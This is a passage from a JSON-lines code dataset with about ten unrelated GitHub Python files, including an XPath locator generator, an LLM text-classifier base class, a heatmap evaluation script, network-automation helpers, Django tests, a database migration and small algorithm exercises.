\"\"\n if len(match) > 0:\n match = pattern.findall(tagname)[0] + \"]\"\n fixed = tagname.replace(match, \"\")\n else: \n fixed = tagname\n return fixed \n\n# Precondition: N < L.length()\n# Action: add //* at the top of xp \n# Example: INPUT: //tr//td\n#\t\t\t\tOUTPUT: //*/tr/td\ndef transfAddLevel(xp, n, l):\n if n < l: \n xp = xp.replace(\"//\", \"/\")\n return \"//*\" + xp\n else: \n return xp \n\n#########################################################################\n### AUXILIARY FUNCTIONS ###\n### ###\n#########################################################################\n\n# return the depth of the element \ndef N(xp): \n return len(xp.split(\"/\")) - 2\n\n# return the height of the whole path \ndef L(xpath): \n temp = xpath.replace(\"//\", \"\")\n elements = temp.split(\"/\")\n if temp[-1] == \"/\":\n elements.pop()\n \n return elements\n\n# returns the element in dom selected by the xpath locator xpath\ndef eval(xpath, document):\n # print(xpath)\n try: \n return document.xpath(xpath)\n except: \n return \"invalid\"\n\n# TRUE iff eval(x, d) contains only e\n# Has to be changed to uniquely locates as we are making a generic xpath\n# Algorithm: If the xpath generated sends us back the same list of elems,\n# then the xpath can generalize to finding a group of elems\n# Query the document using the xpath passed in\n# if the result is similar to elems, then return True,\n# else return False \n# TESTING REQUIRED, BUT BEING 1 or 2 off is our current design choice \n# IF IT HAS NO ATTRIBUTES TO WORK WITH, IT IS TOO GENERAL FOR US \n# print(\"IS %s LOCATABLE IN THE DOM?\" % (xpath))\n# TODO: Fix documentation\ndef generalLocates(xpath, document, elem):\n if \"[\" not in xpath: \n return False\n else:\n elems = eval(xpath, document)\n if elems == \"invalid\": \n return False\n elems = [html.tostring(elem).decode('utf-8') for elem in elems]\n return elem in elems\n\n# Parse tagname and remove positions first \n# TODO: Add documentation\ndef getAttributes(elem, tagname):\n fixed = transfRemovePosition(tagname)\n soup = BeautifulSoup(elem, 'lxml')\n tag = soup.find(fixed)\n if tag == None:\n return [] \n else:\n return tag.attrs\n\n# TODO: Add documentation\ndef buildXPath(xpath_list):\n string = \"//\"\n for elem in xpath_list:\n string += elem + \"/\"\n return string[:-1]\n\n# TODO: Add documentation and threading functionality\ndef RobulaPlus(xpath, elems, pathL, doc, blacklist, TARGET): \n xpath_list = []\n reverseL = pathL[::-1]\n for elem in elems:\n stringified = html.tostring(elem).decode('utf-8')\n XList = [\"//*\"]\n ctr = 0\n while True:\n if ctr > 50: \n raise TimeoutError\n # return []\n xp = XList.pop(0) # pop front of list\n temp = []\n currN = pathL[N(xp) - 1]\n new_elems = eval(buildXPath(reverseL[:-(N(xp) - 1)]), doc)\n new_elem = \"\"\n if len(new_elems) >= 1: \n if len(new_elems[0]) > 2000: \n new_elem = html.tostring(new_elems[1]).decode('utf-8')\n else: \n new_elem = html.tostring(new_elems[0]).decode('utf-8')\n xp1 = transfConvertStar(xp, currN)\n temp.append(xp1)\n xp2 = transfAddAttribute(xp1, getAttributes(new_elem, currN), currN, blacklist)\n\n if len(xp2) >= 1:\n for x in xp2: \n temp.append(x)\n temp.append(transfAddLevel(x, N(x), len(pathL)))\n else: \n temp.append(transfAddLevel(xp1,N(xp1), len(pathL)))\n\n for i, item in enumerate(temp): \n temp[i] = transfRemovePosition(item)\n # print(temp)\n for t in temp[::-1]: \n if generalLocates(t, doc, stringified):\n xpath_list.append(t)\n if len(xpath_list) == TARGET: \n return xpath_list\n else: \n XList.append(t)\n ctr += 1\n\n# TODO: Clean up main \ndef RunRobula(url, text, output, html_output, TARGET=4, blacklist_tags=['href', 'id', 'role', 'type', 'script'], TIMEOUT=10, page=None): \n global GLOBAL_TIMEOUT\n GLOBAL_TIMEOUT = TIMEOUT\n # print(\"Working url: %s\" % (url))\n # print(\"Working text xpath: %s\" % ('//*[contains(text(),' + '\"' + text + '\")]'))\n xpath = text\n\n document = html.fromstring(page)\n filtered = []\n xpaths = getAbsXpaths(document, xpath)\n # print(xpaths)\n for xp in xpaths:\n elems = eval(xp, document)\n if elems == \"invalid\":\n continue \n pathL = L(xp)\n # print(\"Iteration %d\" % (i))\n new_xpaths = []\n try: \n new_xpaths = RobulaPlus(xpath, elems, pathL[::-1], document, blacklist_tags, TARGET)\n except TimeoutError:\n continue\n if new_xpaths is not None:\n for xp2 in new_xpaths: \n if not xp2.startswith(\"//*\"): \n filtered.append(xp2) \n # print(\"FILTERED XPATHS FOUND: \", filtered)\n\n final_list = [] \n for item in filtered: \n if item not in final_list: \n final_list.append(item)\n \n if len(final_list) == 0:\n # print(\"Robula could not find any xpaths in time. Try again...\")\n return\n\n with open(output, \"w\") as f: \n for line in final_list:\n f.write(line + \"\\n\")\n \n lens = []\n for item in final_list: \n xpath = item\n elems = eval(xpath, document)\n elems = [html.tostring(elem).decode('utf-8') for elem in elems]\n lens.append(len(elems))\n with open(html_output, \"a\") as f:\n f.write(\"Score: %d\\n\" % (len(elems)))\n for elem in elems: \n f.write(elem + \"\\n\")\n f.write(\"\\n\")\n best_index = lens.index(max(lens))\n print(\"Best XPATH found is: %s\" % (final_list[best_index]))\n\n","repo_name":"drybell/RobulaPython","sub_path":"scripts/robula_engine/run_robula.py","file_name":"run_robula.py","file_ext":"py","file_size_in_byte":9997,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"18"} +{"seq_id":"36238695735","text":"import random\nfrom abc import ABC, abstractmethod\nfrom collections import Counter\nfrom typing import Any, List, Optional, Union\n\nimport numpy as np\nimport pandas as pd\nfrom sklearn.base import BaseEstimator, ClassifierMixin\nfrom tqdm import tqdm\n\nfrom skllm.completions import get_chat_completion\nfrom skllm.openai.chatgpt import construct_message\nfrom skllm.openai.mixin import OpenAIMixin as _OAIMixin\nfrom skllm.utils import extract_json_key\nfrom skllm.utils import to_numpy as _to_numpy\n\n\nclass BaseClassifier(ABC, BaseEstimator, ClassifierMixin):\n default_label: Optional[str] = \"Random\"\n\n def _to_np(self, X):\n \"\"\"Converts X to a numpy array.\n\n Parameters\n ----------\n X : Any\n The input data to convert to a numpy array.\n\n Returns\n -------\n np.ndarray\n The input data as a numpy array.\n \"\"\"\n return _to_numpy(X)\n\n @abstractmethod\n def _predict_single(self, x: str) -> Any:\n \"\"\"Predicts the class of a single input.\"\"\"\n pass\n\n def fit(\n self,\n X: Optional[Union[np.ndarray, pd.Series, List[str]]],\n y: Union[np.ndarray, pd.Series, List[str], List[List[str]]],\n ):\n \"\"\"Extracts the target for each datapoint in X.\n\n Parameters\n ----------\n X : Optional[Union[np.ndarray, pd.Series, List[str]]]\n The input array data to fit the model to.\n\n y : Union[np.ndarray, pd.Series, List[str], List[List[str]]]\n The target array data to fit the model to.\n \"\"\"\n X = self._to_np(X)\n self.classes_, self.probabilities_ = self._get_unique_targets(y)\n return self\n\n def predict(self, X: Union[np.ndarray, pd.Series, List[str]]):\n \"\"\"Predicts the class of each input.\n\n Parameters\n ----------\n X : Union[np.ndarray, pd.Series, List[str]]\n The input data to predict the class of.\n\n Returns\n -------\n List[str]\n \"\"\"\n X = self._to_np(X)\n predictions = []\n for i in tqdm(range(len(X))):\n predictions.append(self._predict_single(X[i]))\n return predictions\n\n def _get_unique_targets(self, y: Any):\n labels = self._extract_labels(y)\n\n counts = Counter(labels)\n\n total = sum(counts.values())\n\n classes, probs = [], []\n for l, c in counts.items():\n classes.append(l)\n probs.append(c / total)\n\n return classes, probs\n\n def _extract_labels(self, y: Any) -> List[str]:\n \"\"\"Return the class labels as a list.\n\n Parameters\n ----------\n y : Any\n\n Returns\n -------\n List[str]\n \"\"\"\n if isinstance(y, (pd.Series, np.ndarray)):\n labels = y.tolist()\n else:\n labels = y\n return labels\n\n def _get_default_label(self):\n \"\"\"Returns the default label based on the default_label argument.\"\"\"\n if self.default_label == \"Random\":\n return random.choices(self.classes_, self.probabilities_)[0]\n else:\n return self.default_label\n\n\nclass _BaseZeroShotGPTClassifier(BaseClassifier, _OAIMixin):\n \"\"\"Base class for zero-shot classifiers.\n\n Parameters\n ----------\n openai_key : Optional[str] , default : None\n Your OpenAI API key. If None, the key will be read from the SKLLM_CONFIG_OPENAI_KEY environment variable.\n openai_org : Optional[str] , default : None\n Your OpenAI organization. If None, the organization will be read from the SKLLM_CONFIG_OPENAI_ORG\n environment variable.\n openai_model : str , default : \"gpt-3.5-turbo\"\n The OpenAI model to use. See https://beta.openai.com/docs/api-reference/available-models for a list of\n available models.\n default_label : Optional[Union[List[str], str]] , default : 'Random'\n The default label to use if the LLM could not generate a response for a sample. If set to 'Random' a random\n label will be chosen based on probabilities from the training set.\n prompt_template: str , A formattable string with the following placeholders: {x} - the sample to classify, {labels} - the list of labels.\n If None, the default prompt template will be used.\n \"\"\"\n\n def __init__(\n self,\n openai_key: Optional[str] = None,\n openai_org: Optional[str] = None,\n openai_model: str = \"gpt-3.5-turbo\",\n default_label: Optional[Union[List[str], str]] = \"Random\",\n prompt_template: Optional[str] = None,\n ):\n self._set_keys(openai_key, openai_org)\n self.openai_model = openai_model\n self.default_label = default_label\n self.prompt_template = prompt_template\n\n @abstractmethod\n def _get_prompt(self, x: str) -> str:\n \"\"\"Generates a prompt for the given input.\"\"\"\n pass\n\n def _get_chat_completion(self, x):\n prompt = self._get_prompt(x)\n msgs = []\n msgs.append(construct_message(\"system\", \"You are a text classification model.\"))\n msgs.append(construct_message(\"user\", prompt))\n completion = get_chat_completion(\n msgs, self._get_openai_key(), self._get_openai_org(), self.openai_model\n )\n return completion\n\n def _predict_single(self, x):\n \"\"\"Predicts the labels for a single sample.\n\n Should work for all (single label) GPT based classifiers.\n \"\"\"\n completion = self._get_chat_completion(x)\n try:\n label = str(\n extract_json_key(\n completion[\"choices\"][0][\"message\"][\"content\"], \"label\"\n )\n )\n except Exception as e:\n print(completion)\n print(f\"Could not extract the label from the completion: {str(e)}\")\n label = \"\"\n\n if label not in self.classes_:\n label = label.replace(\"'\", \"\").replace('\"', \"\")\n if label not in self.classes_: # try again\n label = self._get_default_label()\n return label\n\n\nclass _BasePaLMClassifier(BaseClassifier):\n def __init__(self, model: str, default_label: Optional[str] = \"Random\"):\n self.model = model\n self.default_label = default_label\n","repo_name":"iryna-kondr/scikit-llm","sub_path":"skllm/models/_base.py","file_name":"_base.py","file_ext":"py","file_size_in_byte":6251,"program_lang":"python","lang":"en","doc_type":"code","stars":2708,"dataset":"github-code","pt":"18"} +{"seq_id":"11828707853","text":"import torch\nimport argparse\nimport tqdm\nimport os \nimport glob\n\nfrom utils import evaluation\n\nparser = argparse.ArgumentParser()\nparser.add_argument('--dset', default='opra')\nparser.add_argument('--load', default=None)\nparser.add_argument('--res', type=int, default=28)\nparser.add_argument('--batch_size', type=int, default=64)\nargs = parser.parse_args()\n#------------------------------------------------------------#\n\nimport data\nfrom data import opra, epic\nimport torch.nn.functional as F\ndef generate_gt(dset):\n\n os.makedirs('data/%s/output/'%dset, exist_ok=True)\n\n if dset=='opra':\n dataset = opra.OPRAHeatmaps(root=data._DATA_ROOTS[dset], split='val') \n elif dset=='epic':\n dataset = epic.EPICHeatmaps(root=data._DATA_ROOTS[dset], split='val') \n\n dataset.heatmaps = dataset.init_hm_loader() \n\n heatmaps, keys = [], []\n for index in tqdm.tqdm(range(len(dataset))):\n entry = dataset.data[index]\n hm_key = tuple(entry['image']) + (str(entry['verb']),)\n heatmap = dataset.heatmaps(hm_key)\n heatmap = torch.from_numpy(heatmap)\n heatmap = F.interpolate(heatmap.unsqueeze(0).unsqueeze(0), size=(224, 224), mode='bilinear', align_corners=False)[0][0]\n heatmap = heatmap/(heatmap.sum()+1e-12)\n\n heatmaps.append(heatmap)\n keys.append(hm_key)\n\n heatmaps = torch.stack(heatmaps, 0)\n print (heatmaps.shape)\n torch.save({'heatmaps':heatmaps, 'keys':keys}, 'data/%s/output/gt.pth'%(dset))\n\n#------------------------------------------------------------#\n\nfrom models import intcam\ndef generate_heatmaps(dset, load, batch_size):\n\n if dset=='opra':\n testset = opra.OPRAHeatmaps(root=data._DATA_ROOTS[dset], split='val') \n elif dset=='epic':\n testset = epic.EPICHeatmaps(root=data._DATA_ROOTS[dset], split='val') \n\n testloader = torch.utils.data.DataLoader(testset, batch_size=batch_size, shuffle=False, num_workers=2)\n\n from models import rnn, backbones\n torch.backends.cudnn.enabled = False\n net = rnn.frame_lstm(len(testset.verbs), max_len=-1, backbone=backbones.dr50_n28)\n\n checkpoint = torch.load(load, map_location='cpu')\n weights = checkpoint['net']\n net.load_state_dict(weights)\n net.eval().cuda()\n print ('Loaded checkpoint from %s'%os.path.basename(load))\n \n gcam = intcam.IntCAM(net)\n\n heatmaps = []\n for batch in tqdm.tqdm(testloader, total=len(testloader)):\n \n img, verb = batch['img'], batch['verb'] \n masks = gcam.generate_cams(img.cuda(), [verb]) # (B, T, C, 7, 7)\n mask = masks.mean(1) # (B, C, 7, 7) <-- average across hallucinated time dim\n mask = mask.squeeze(1) # get rid of single class dim\n heatmaps.append(mask.cpu())\n\n heatmaps = torch.cat(heatmaps, 0) # (N, C, 7, 7)\n print (heatmaps.shape)\n\n keys = [testset.key(entry) for entry in testset.data]\n torch.save({'heatmaps':heatmaps, 'keys':keys}, '%s.%s.heatmaps'%(load, dset))\n\n\n#------------------------------------------------------------#\n\nif __name__=='__main__':\n\n # generate gt heatmaps if they do not already exist\n if not os.path.exists('data/%s/output/gt.pth'%(args.dset)):\n generate_gt()\n\n # generate heatmap predictions if they do not already exist\n if args.load and not os.path.exists('%s.%s.heatmaps'%(args.load, args.dset)):\n generate_heatmaps(args.dset, args.load, args.batch_size)\n print ('loading checkpoint:', args.load)\n\n gt = torch.load('data/%s/output/gt.pth'%(args.dset))\n baselines = evaluation.Baselines(gt['heatmaps'].shape[0])\n heval = evaluation.Evaluator(gt, res=args.res, log=args.load)\n\n # Comment in other methods to compare\n predictions = {\n # 'center': baselines.gaussian(),\n # 'egogaze': baselines.checkpoint('data/%s/output/egogaze.pth'%(args.dset)),\n # 'mlnet': baselines.checkpoint('data/%s/output/mlnet.pth'%(args.dset)),\n # 'deepgaze2': baselines.checkpoint('data/%s/output/deepgaze2.pth'%(args.dset)),\n # 'salgan': baselines.checkpoint('data/%s/output/salgan.pth'%(args.dset)),\n 'hotspots': baselines.checkpoint('%s.%s.heatmaps'%(args.load, args.dset)),\n # 'img2heatmap': baselines.checkpoint('data/%s/output/img2heatmap.pth'%(args.dset)),\n }\n if args.dset=='opra':\n predictions.update({\n # 'demo2vec': baselines.checkpoint('data/opra/output/d2v.pth'),\n })\n\n for method in predictions:\n print (method)\n heatmaps = predictions[method]\n scores = heval.evaluate(heatmaps)\n\n","repo_name":"Tushar-N/interaction-hotspots","sub_path":"eval.py","file_name":"eval.py","file_ext":"py","file_size_in_byte":4537,"program_lang":"python","lang":"en","doc_type":"code","stars":45,"dataset":"github-code","pt":"18"} +{"seq_id":"39599866945","text":"frase = str(input('Digite uma frase qualquer: ').upper())\r\nespaco = frase.strip() # tira os espacos do final e do começo\r\ndiv = espaco.split() # faz divisao a cada espaco\r\njunto = ''.join(div) # junta a divisao com um termo entre: ''\r\ninverso = ''\r\ninverso = junto[::-1]\r\n'''for c in range(len(junto)-1, -1, -1):\r\n inverso += junto[c]'''\r\nprint('O inverso de {} é {}'.format(junto, inverso))\r\nif junto == inverso:\r\n print('A frase digitada é um palindromo!')\r\nelse:\r\n print('A frase digitada não é um palindromo!')\r\n\r\n","repo_name":"GabsOrtega/logica-python","sub_path":"exercicios_python/Exercicio_053.py","file_name":"Exercicio_053.py","file_ext":"py","file_size_in_byte":532,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"43188039120","text":"import os\nfrom dataclasses import dataclass\nfrom functools import lru_cache\nfrom typing import List, Optional, Tuple, Union\n\nfrom jinja2 import Environment as JinjaEnvironment\nfrom jinja2 import FileSystemLoader\nfrom netutils.utils import jinja2_convenience_function\nfrom nornir import InitNornir\nfrom nornir.core import Nornir\nfrom nornir.core.filter import F\nfrom nornir.core.plugins.inventory import InventoryPluginRegister\nfrom nornir.core.task import AggregatedResult, MultiResult\n\nfrom cnaas_nms.devicehandler.nornir_plugins.cnaas_inventory import CnaasInventory\nfrom cnaas_nms.scheduler.jobresult import JobResult\nfrom cnaas_nms.tools import jinja_filters\n\n\n@dataclass\nclass NornirJobResult(JobResult):\n nrresult: Optional[MultiResult] = None\n change_score: Optional[float] = None\n\n\nclass RelativeJinjaEnvironment(JinjaEnvironment):\n \"\"\"Enable relative template paths\"\"\"\n\n def join_path(self, template, parent):\n return os.path.join(os.path.dirname(parent), template)\n\n\n@lru_cache(maxsize=8)\ndef get_jinja_env(path):\n jinja_env = RelativeJinjaEnvironment(\n trim_blocks=True,\n lstrip_blocks=True,\n keep_trailing_newline=True,\n loader=FileSystemLoader(path),\n cache_size=0,\n )\n jinja_env.filters.update(jinja_filters.FILTERS)\n jinja_env.filters.update(jinja2_convenience_function())\n return jinja_env\n\n\ndef cnaas_init() -> Nornir:\n InventoryPluginRegister.register(\"CnaasInventory\", CnaasInventory)\n nr = InitNornir(\n runner={\"plugin\": \"threaded\", \"options\": {\"num_workers\": 50}},\n inventory={\"plugin\": \"CnaasInventory\"},\n logging={\"log_file\": \"/tmp/nornir-pid{}.log\".format(os.getpid()), \"level\": \"DEBUG\"},\n )\n return nr\n\n\ndef nr_result_serialize(result: AggregatedResult):\n if not isinstance(result, AggregatedResult):\n raise ValueError(\"result must be of type AggregatedResult\")\n\n hosts = {}\n for host, multires in result.items():\n hosts[host] = {\"failed\": False, \"job_tasks\": []}\n for res in multires:\n hosts[host][\"job_tasks\"].append(\n {\"task_name\": res.name, \"result\": res.result, \"diff\": res.diff, \"failed\": res.failed}\n )\n if res.failed:\n hosts[host][\"failed\"] = True\n return hosts\n\n\ndef inventory_selector(\n nr: Nornir,\n resync: bool = True,\n hostname: Optional[Union[str, List[str]]] = None,\n device_type: Optional[str] = None,\n group: Optional[str] = None,\n) -> Tuple[Nornir, int, List[str]]:\n \"\"\"Return a filtered Nornir inventory with only the selected devices\n\n Args:\n nr: Nornir object\n resync: Set to false if you want to filter out devices that are synchronized\n hostname: Select device by hostname (string) or list of hostnames (list)\n device_type: Select device by device_type (string)\n group: Select device by group (string)\n\n Returns:\n Tuple with: filtered Nornir inventory, total device count selected,\n list of hostnames that was skipped because of resync=False\n \"\"\"\n skipped_devices = []\n if hostname:\n if isinstance(hostname, str):\n nr_filtered = nr.filter(name=hostname).filter(managed=True)\n elif isinstance(hostname, list):\n nr_filtered = nr.filter(filter_func=lambda h: h.name in hostname).filter(managed=True)\n else:\n raise ValueError(\"Can't select hostname based on type {}\".type(hostname))\n elif device_type:\n nr_filtered = nr.filter(F(groups__contains=\"T_\" + device_type)).filter(managed=True)\n elif group:\n nr_filtered = nr.filter(F(groups__contains=group)).filter(managed=True)\n else:\n # all devices\n nr_filtered = nr.filter(managed=True)\n\n if resync or hostname:\n return nr_filtered, len(nr_filtered.inventory.hosts), skipped_devices\n else:\n pre_device_list = list(nr_filtered.inventory.hosts.keys())\n nr_filtered = nr_filtered.filter(synchronized=False)\n post_device_list = list(nr_filtered.inventory.hosts.keys())\n skipped_devices = [x for x in pre_device_list if x not in post_device_list]\n return nr_filtered, len(post_device_list), skipped_devices\n","repo_name":"SUNET/cnaas-nms","sub_path":"src/cnaas_nms/devicehandler/nornir_helper.py","file_name":"nornir_helper.py","file_ext":"py","file_size_in_byte":4225,"program_lang":"python","lang":"en","doc_type":"code","stars":66,"dataset":"github-code","pt":"18"} +{"seq_id":"73754230761","text":"#https://leetcode.com/problems/valid-triangle-number/\n#Given an integer array nums, return the number of triplets chosen from the array that can make triangles if we take them as side lengths of a triangle.\n# \n#Example 1:\n#Input: nums = [2,2,3,4]\n#Output: 3\n#Explanation: Valid combinations are: \n#2,3,4 (using the first 2)\n#2,3,4 (using the second 2)\n#2,2,3\n#Example 2:\n#Input: nums = [4,2,3,4]\n#Output: 4\n# \n#Constraints:\n#\t1 <= nums.length <= 1000\n#\t0 <= nums[i] <= 1000\nclass Solution(object):\n def triangleNumber(self, nums):\n \"\"\"\n :type nums: List[int]\n :rtype: int\n \"\"\"\n #Solution\n #1. Sort the nums in ascending order\n #2. For each number in nums, check if it is greater than the last number in each subsequence\n #3. If it is, add the new subsequence to the result\n #4. Return the result\n #\n #Example:\n #nums: [2,2,3,4]\n #ret: 3\n #\n #Time complexity: O(n^2)\n #Space complexity: O(n)\n\n ret = 0\n nums.sort()\n for i in range(len(nums)):\n for j in range(i + 1, len(nums)):\n for k in range(j + 1, len(nums)):\n if nums[i] + nums[j] > nums[k]:\n ret += 1\n\n return ret","repo_name":"Wang-dongyu123/CopilotCodeQuality","sub_path":"output/python/Medium/882-valid-triangle-number.py","file_name":"882-valid-triangle-number.py","file_ext":"py","file_size_in_byte":1280,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"22815372537","text":"# -*- coding: utf-8 -*-\nfrom unittest import mock\n\nimport pytest\n\nfrom paas_wl.release_controller.hooks.models import Command\nfrom paas_wl.utils.constants import CommandStatus, CommandType\n\npytestmark = pytest.mark.django_db\n\n\nclass TestCommandViewSet:\n @pytest.fixture()\n def hook_maker(self, fake_app, fake_simple_build, bk_user):\n def core(command: str) -> Command:\n return fake_app.command_set.new(\n type_=CommandType.PRE_RELEASE_HOOK,\n operator=bk_user.username,\n build=fake_simple_build,\n command=command,\n )\n\n return core\n\n def test_create(self, api_client, fake_app, fake_simple_build, settings):\n url = f\"/regions/{settings.FOR_TESTS_DEFAULT_REGION}/apps/{fake_app.name}/commands/\"\n data = {\n \"type\": \"pre-release-hook\",\n \"command\": \"echo 1;\",\n \"build\": fake_simple_build.uuid,\n \"operator\": \"nobody\",\n }\n with mock.patch(\"paas_wl.resources.tasks.run_command\") as run_command:\n resp = api_client.post(url, data=data)\n\n assert run_command.delay.called\n assert resp.status_code == 201\n\n pk = resp.json()[\"uuid\"]\n assert Command.objects.get(pk=pk)\n\n def test_retrieve(self, api_client, fake_app, hook_maker, settings):\n command = hook_maker(\"echo 1;\")\n url = f\"/regions/{settings.FOR_TESTS_DEFAULT_REGION}/apps/{fake_app.name}/commands/{command.uuid}\"\n resp = api_client.get(url)\n\n assert resp.status_code == 200\n assert resp.json()[\"uuid\"] == str(command.uuid)\n\n @pytest.mark.parametrize(\n \"status, expected\",\n [\n (CommandStatus.FAILED, 400),\n (CommandStatus.SUCCESSFUL, 400),\n (CommandStatus.INTERRUPTED, 400),\n (CommandStatus.SCHEDULED, 200),\n (CommandStatus.PENDING, 200),\n ],\n )\n def test_interrupt_command_x_status(self, api_client, fake_app, hook_maker, settings, status, expected):\n command = hook_maker(\"echo 1;\")\n command.set_logs_was_ready()\n command.update_status(status)\n\n url = (\n f\"/regions/{settings.FOR_TESTS_DEFAULT_REGION}\"\n f\"/apps/{fake_app.name}/commands/{command.uuid}/interruptions\"\n )\n\n with mock.patch(\"paas_wl.resources.base.controllers.CommandHandler.interrupt_command\"):\n resp = api_client.post(url)\n\n assert resp.status_code == expected\n\n def test_interrupt_command_failed(self, api_client, fake_app, hook_maker, settings):\n command = hook_maker(\"echo 1;\")\n command.set_logs_was_ready()\n command.update_status(CommandStatus.SCHEDULED)\n\n url = (\n f\"/regions/{settings.FOR_TESTS_DEFAULT_REGION}\"\n f\"/apps/{fake_app.name}/commands/{command.uuid}/interruptions\"\n )\n\n with mock.patch(\n \"paas_wl.resources.base.controllers.CommandHandler.interrupt_command\",\n mock.MagicMock(return_value=False),\n ):\n resp = api_client.post(url)\n\n assert resp.status_code == 400\n assert resp.json() == {'code': 'INTERRUPTION_FAILED', 'detail': '中断失败: 指令可能已执行完毕.'}\n","repo_name":"leafage-collb/bk-paas","sub_path":"workloads/paas_wl/tests/api/system_api/test_command.py","file_name":"test_command.py","file_ext":"py","file_size_in_byte":3243,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"18"} +{"seq_id":"13064017556","text":"\"\"\"Revise security group rules\n\nRevision ID: 26e984b48a0d\nRevises: 1664300cb03a\nCreate Date: 2014-09-16 22:01:07.329380\n\n\"\"\"\n\n# revision identifiers, used by Alembic.\nrevision = '26e984b48a0d'\ndown_revision = '1664300cb03a'\n\nfrom alembic import op\nimport sqlalchemy as sa\n\n\nOLD_TABLE = \"quark_security_group_rule\"\nNEW_TABLE = \"quark_security_group_rules\"\n\n\ndef upgrade():\n # NOTE(mdietz): You can't change the datatype or remove columns,\n # in SQLite, please see\n # http://sqlite.org/lang_altertable.html\n op.drop_table(OLD_TABLE)\n op.create_table(\n NEW_TABLE,\n sa.Column('tenant_id', sa.String(length=255), nullable=True),\n sa.Column('created_at', sa.DateTime(), nullable=True),\n sa.Column('id', sa.String(length=36), nullable=False),\n sa.Column('group_id', sa.String(length=36), nullable=False),\n sa.Column('direction', sa.String(length=10), nullable=False),\n sa.Column('port_range_max', sa.Integer(), nullable=True),\n sa.Column('port_range_min', sa.Integer(), nullable=True),\n sa.Column('protocol', sa.Integer(), nullable=True),\n sa.Column(\"ethertype\", type_=sa.Integer(), nullable=False),\n sa.Column('remote_group_id', sa.String(length=36), nullable=True),\n sa.Column(\"remote_ip_prefix\", type_=sa.String(255)),\n sa.ForeignKeyConstraint([\"remote_group_id\"],\n [\"quark_security_groups.id\"],\n \"fk_remote_group_id\"),\n sa.ForeignKeyConstraint(['group_id'], ['quark_security_groups.id'], ),\n sa.PrimaryKeyConstraint('id'),\n mysql_engine=\"InnoDB\")\n\n\ndef downgrade():\n op.drop_table(NEW_TABLE)\n op.create_table(\n OLD_TABLE,\n sa.Column('tenant_id', sa.String(length=255), nullable=True),\n sa.Column('created_at', sa.DateTime(), nullable=True),\n sa.Column('id', sa.String(length=36), nullable=False),\n sa.Column('group_id', sa.String(length=36), nullable=False),\n sa.Column('direction', sa.String(length=10), nullable=False),\n sa.Column('ethertype', sa.String(length=4), nullable=False),\n sa.Column('port_range_max', sa.Integer(), nullable=True),\n sa.Column('port_range_min', sa.Integer(), nullable=True),\n sa.Column('protocol', sa.Integer(), nullable=True),\n sa.Column('remote_ip_prefix', sa.String(length=22), nullable=True),\n sa.Column('remote_group_id', sa.String(length=36), nullable=True),\n sa.ForeignKeyConstraint(['group_id'], ['quark_security_groups.id'], ),\n sa.PrimaryKeyConstraint('id'),\n mysql_engine='InnoDB')\n","repo_name":"MichaelPorras/quark","sub_path":"quark/db/migration/alembic/versions/26e984b48a0d_revise_security_group_rules.py","file_name":"26e984b48a0d_revise_security_group_rules.py","file_ext":"py","file_size_in_byte":2645,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"18"} +{"seq_id":"37302362084","text":"n = int(input())\n\nclass FenwickTree:\n def __init__(self, x):\n self.bit = x\n for i in range(len(x)):\n j = i | (i + 1)\n if j < len(x):\n x[j] = max(x[j], x[i])\n\n def update(self, idx, x):\n while idx < len(self.bit):\n self.bit[idx] = max(self.bit[idx], x)\n idx |= idx + 1\n\n def query(self, end):\n x = float('-inf')\n while end:\n x = max(x, self.bit[end - 1])\n end &= end - 1\n return x\n\nboxes = []\n\nmp = {}\n\nfor _ in range(n):\n a, b, c = map(int, input().split())\n mp[a] = mp[b] = mp[c] = 0\n boxes.append(tuple(sorted([a, b, c])))\n\nfor i, el in enumerate(sorted(mp)):\n mp[el] = i\n\nboxes = [(mp[b[0]], mp[b[1]], mp[b[2]]) for b in boxes]\n\nboxes.sort()\n\nj = n - 1\n\nfw = FenwickTree([float('-inf')] * (len(mp) + 1))\n\nfound = False\n\nfor i in range(n - 1, -1, -1):\n while j > i and boxes[j][0] > boxes[i][0]:\n fw.update(len(mp) - boxes[j][1] - 1, boxes[j][2])\n j -= 1\n if fw.query(len(mp) - boxes[i][1] - 1) > boxes[i][2]:\n found = True\n break\n \nprint(\"Yes\" if found else \"No\")","repo_name":"theabbie/leetcode","sub_path":"miscellaneous/F_Box_in_Box.py","file_name":"F_Box_in_Box.py","file_ext":"py","file_size_in_byte":1147,"program_lang":"python","lang":"en","doc_type":"code","stars":11,"dataset":"github-code","pt":"18"} +{"seq_id":"41246921764","text":"class Node(object):\n def __init__(self,sName):\n self._lChildren = []\n self.sName = sName\n def __repr__(self):\n return \"\".format(self.sName)\n def append(self,*args,**kwargs):\n self._lChildren.append(*args,**kwargs)\n def print_all_1(self):\n print(self)\n for oChild in self._lChildren:\n oChild.print_all_1()\n def print_all_2(self):\n def gen(o):\n print(\"o={} \".format(o), end='')\n lAll = [o,]\n print(\"lAll={} \".format(lAll), end='')\n while lAll:\n oNext = lAll.pop(0)\n print(\"\\n\\tlAll={} \".format(lAll), end='')\n print(\"\\n\\toNext={}\".format(oNext), end='')\n lAll.extend(oNext._lChildren)\n print(\"\\n\\tlAll={} \".format(lAll), end='')\n yield oNext \n for oNode in gen(self):\n print(\"\")\n print(oNode)\n\noRoot = Node(\"root\")\noChild1 = Node(\"child1\")\noChild2 = Node(\"child2\")\noChild3 = Node(\"child3\")\noChild4 = Node(\"child4\")\noChild5 = Node(\"child5\")\noChild6 = Node(\"child6\")\noChild7 = Node(\"child7\")\noChild8 = Node(\"child8\")\noChild9 = Node(\"child9\")\noChild10 = Node(\"child10\")\n\noRoot.append(oChild1)\noRoot.append(oChild2)\noRoot.append(oChild3)\noChild1.append(oChild4)\noChild1.append(oChild5)\noChild2.append(oChild6)\noChild4.append(oChild7)\noChild3.append(oChild8)\noChild3.append(oChild9)\noChild6.append(oChild10)\n\n# specify output from here 